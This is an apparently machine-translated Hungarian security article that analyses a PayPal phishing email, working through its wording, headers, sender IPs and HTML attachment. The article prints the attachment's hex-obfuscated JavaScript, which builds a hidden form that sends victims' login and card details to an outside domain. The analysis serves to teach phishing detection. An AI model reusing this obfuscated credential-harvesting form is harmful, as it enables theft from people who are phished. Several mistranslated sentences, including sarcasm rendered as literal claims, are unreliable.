Homepage » hogyan kell » Online biztonság Az adathalász e-mail anatómiájának lebontása

    Online biztonság Az adathalász e-mail anatómiájának lebontása


    A mai világban, ahol mindenki tájékoztatása online, az adathalászat az egyik legnépszerűbb és legpusztítóbb online támadás, mert mindig tisztíthat egy vírust, de ha a banki adatait ellopják, bajban van. Itt van egy ilyen támadás, amit kaptunk.

    Nem hiszem, hogy csak a banki adatai fontosak: végül is, ha valaki átveheti a fiókja bejelentkezését, nemcsak az adott fiókban található információkat ismerik, hanem az esélye, hogy ugyanazok a bejelentkezési adatok különböző más fiókok. És ha veszélyezteti az e-mail fiókot, visszaállíthatja az összes többi jelszavát.

    Tehát az erős és változatos jelszavak megtartása mellett mindig a valóságos dolognak szánt hamis e-maileket kell keresnie. Míg a legtöbb adathalász-kísérlet amatőr, néhányan meggyőzőek, ezért fontos megérteni, hogyan lehet felismerni őket a felszínen, és hogyan működik a motorháztető alatt.

    Kép asirap

    Vizsgálat Mi az az egyszerű látás

    Példa e-mailünk, mint a legtöbb adathalász kísérlet, „értesíti” a PayPal-fiókod tevékenységéről, amely normális körülmények között riasztó lenne. Tehát a cselekvésre való felhívás az, hogy ellenőrizze / visszaállítsa a fiókját, ha csaknem minden személyes adatot közöl. Ez is meglehetősen képlékeny.

    Bár minden bizonnyal vannak kivételek, minden adathalászat és átverés e-mailben van egy piros zászlóval közvetlenül az üzenetben. Még akkor is, ha a szöveg meggyőző, általában sok olyan hibát találsz, amelyek az üzenet testében tele vannak, ami azt jelzi, hogy az üzenet nem legitim.

    Az üzenet teste

    Első pillantásra ez az egyik jobb adathalász e-mail, amit láttam. Nincsenek helyesírási vagy nyelvtani hibák, és a szószedet az elvárások szerint olvasható. Néhány piros zászló is látható, amikor egy kicsit jobban megvizsgálja a tartalmat.

    • „Paypal” - A helyes eset a „PayPal” (tőke P). Láthatjuk, hogy az üzenetben mindkét változat használható. A vállalatok nagyon szándékosak a márkajelzéssel, így kétséges, hogy ez hasonló lenne a korrekciós folyamathoz.
    • „Engedélyezze az ActiveX-et” - Hányszor láttál egy legit webalapú üzletet, a Paypal mérete egy saját összetevőt használ, amely csak egyetlen böngészőn működik, különösen akkor, ha több böngészőt támogat? Persze, valahol ott van néhány cég, de ez egy piros zászló.
    • „Biztonságosan.” - Figyelje meg, hogy ez a szó nem esik a margóba a bekezdés többi részével. Még akkor is, ha egy kicsit tovább feszítem az ablakot, és nem helyes.
    • - Paypal! - A felkiáltójel előtt álló hely kínosnak tűnik. Csak egy másik csípés, amiben biztos vagyok benne, nem lenne legitim e-mailben.
    • „PayPal-Account Update Form.pdf.htm” - Miért csatolja a Paypal „PDF” -et, különösen akkor, ha csak egy oldalra hivatkozhatnak a webhelyükön? Továbbá, miért próbálnák elrejteni egy HTML fájlt PDF formátumban? Ez az összes legnagyobb piros zászlója.

    Az üzenetfejléc

    Ha megnézzük az üzenet fejlécét, néhány piros piros jelző jelenik meg:

    • A cím a [email protected].
    • Hiányzik a cím. Ezt nem hagytam ki, egyszerűen nem része a szabványos üzenetfejlécnek. Jellemzően egy név, amely a neved, személyre szabja az e-mailt.

    A csatolmány

    Amikor megnyitom a mellékletet, azonnal láthatja, hogy az elrendezés nem megfelelő, mivel hiányzik a stílusinformáció. Ismét miért küldjön e-mailben a PayPal egy HTML-űrlapot, amikor egyszerűen megadhat egy linket a webhelyén?

    Jegyzet: Ehhez a Gmail beépített HTML-csatolókészülékét használtuk, de azt javasoljuk, hogy ne nyissa fel a csatolóktól származó mellékleteket. Soha. Valaha. Nagyon gyakran tartalmaznak kihasználásokat, amelyek a trójai programokat a számítógépére telepítik, hogy ellopják a fiókadatait.

    Egy kicsit lefelé görgetve láthatjuk, hogy ez az űrlap nemcsak PayPal bejelentkezési adatainkat, hanem banki és hitelkártya adatait is kéri. Néhány kép törött.

    Nyilvánvaló, hogy ez az adathalász-kísérlet mindent egy fogással követ.

    A műszaki bontás

    Bár elég világosnak kell lennie annak alapján, hogy mi az, ami nyilvánvaló, hogy ez adathalász kísérlet, most le fogjuk bontani az e-mail technikai összetételét, és meglátjuk, mit találunk.

    A melléklet adatai

    Az első dolog, amit meg kell nézni, a melléklet formanyomtatványának HTML-forrása, amely az adatokat a hamis oldalhoz nyújtja.

    Amikor gyorsan megtekinti a forrást, az összes hivatkozás érvényesnek tűnik, amikor a „paypal.com” vagy a „paypalobjects.com” kifejezésre utalnak, amelyek mindkettő legitim.

    Most megnézzük a Firefox által az oldalon gyűjtött néhány alapvető információt.

    Mint látható, néhány grafika a „blessedtobe.com”, a „goodhealthpharmacy.com” és a „pic-upload.de” tartományokból húzódik a legit PayPal tartományok helyett.

    Információk az e-mail fejlécekből

    Ezután megnézzük a nyers e-mail üzenet fejlécét. A Gmail ezt az üzenet eredeti példányának megjelenítése lehetőségével teszi elérhetővé.

    Az eredeti üzenet fejlécinformációit nézve láthatjuk, hogy ez az üzenet az Outlook Express 6 használatával készült. Kétségtelen, hogy a PayPalnak van egy személye a személyzeten, amely ezeket az üzeneteket manuálisan elküldi egy elavult e-mail kliensen keresztül.

    Most megnézve az útválasztási információkat, láthatjuk mind a küldő, mind a közvetítő e-mail szerver IP-címét.

    A „Felhasználó” IP-cím az eredeti küldő. Az IP-információk gyors megkeresése után láthatjuk, hogy a küldő IP Németországban van.

    És amikor megnézzük az átviteli levelezőszerver (mail.itak.at) címét, az IP-cím látható, hogy ez egy internetszolgáltató, amely Ausztriában található. Kétségtelen, hogy a PayPal az e-maileket közvetlenül egy Ausztria alapú internetszolgáltatón keresztül vezeti, amikor hatalmas szerverfarm van, amely könnyen kezelheti ezt a feladatot.

    Hol van az adat?

    Tehát világosan meghatároztuk, hogy ez egy adathalász e-mail, és gyűjtött néhány információt arról, hogy honnan származik az üzenet, de mi a helyzet az adatok elküldésével kapcsolatban??

    Ehhez először el kell mentenünk a HTM-csatolmányt, amit az asztalunkon és a szövegszerkesztőben nyitunk meg. Átkapcsolva minden úgy tűnik, hogy rendben van, kivéve, ha egy gyanús kereső Javascript blokkhoz jutunk.

    A Javascript utolsó mondatának teljes forrását kitörve láthatjuk:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i

    Bármikor láthatsz egy nagy, látszólag véletlenszerűen betűs betűket és számokat, amelyek be van ágyazva egy Javascript blokkba, általában valami gyanús. A kódot tekintve az „x” változó erre a nagy karakterláncra van állítva, majd dekódolva az „y” változóba. Az „y” változó végeredményét ezután HTML-ként írjuk a dokumentumba.

    Mivel a nagy karakterlánc 0-9-es számokból és az a-f betűkből áll, valószínűleg egy egyszerű ASCII-Hex-konverzióval kódolják:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Fordítás:

    Nem véletlen, hogy ez egy érvényes HTML-formátumú címkére dekódol, amely az eredményeket nem a PayPal-ra, hanem egy rosszindulatú webhelyre küldi..

    Továbbá, ha megnézed az űrlap HTML-forrását, látni fogod, hogy ez a formatípus nem látható, mert dinamikusan generálódik a Javascript-en keresztül. Ez egy okos módja annak, hogy elrejtse, amit a HTML ténylegesen csinál, ha valaki egyszerűen megnézte a csatolt forrás forrását (ahogyan azt korábban tettük), szemben a melléklet megnyitásával közvetlenül egy szövegszerkesztőben.

    Gyorsan fut a kártékony webhelyen, láthatjuk, hogy ez egy népszerű webhosztingban tárolt tartomány, 1 és 1.

    Ami kiemelkedik, a tartomány olvasható nevet használ (a „dfh3sjhskjhw.net” -hez hasonlóan), és a domain 4 éve regisztrált. Emiatt azt hiszem, hogy ez a tartomány fel lett függesztve, és gyalogként használják ezt az adathalász kísérletet.

    A cinizmus jó védelem

    Amikor biztonságban marad az interneten, soha nem árt a jó cinizmusnak.

    Bár biztos vagyok benne, hogy a példa e-mailben több piros zászló is van, a fentiekben jelzett mutatók csak néhány percnyi vizsgálat után láttak. Hipotetikusan, ha az e-mail felszíni szintje 100% -át utánozza a jogos ellenfelét, a technikai elemzés még mindig felfedi a valódi természetét. Ezért importálódik, hogy megvizsgálhassa mindazt, amit tud és nem lát.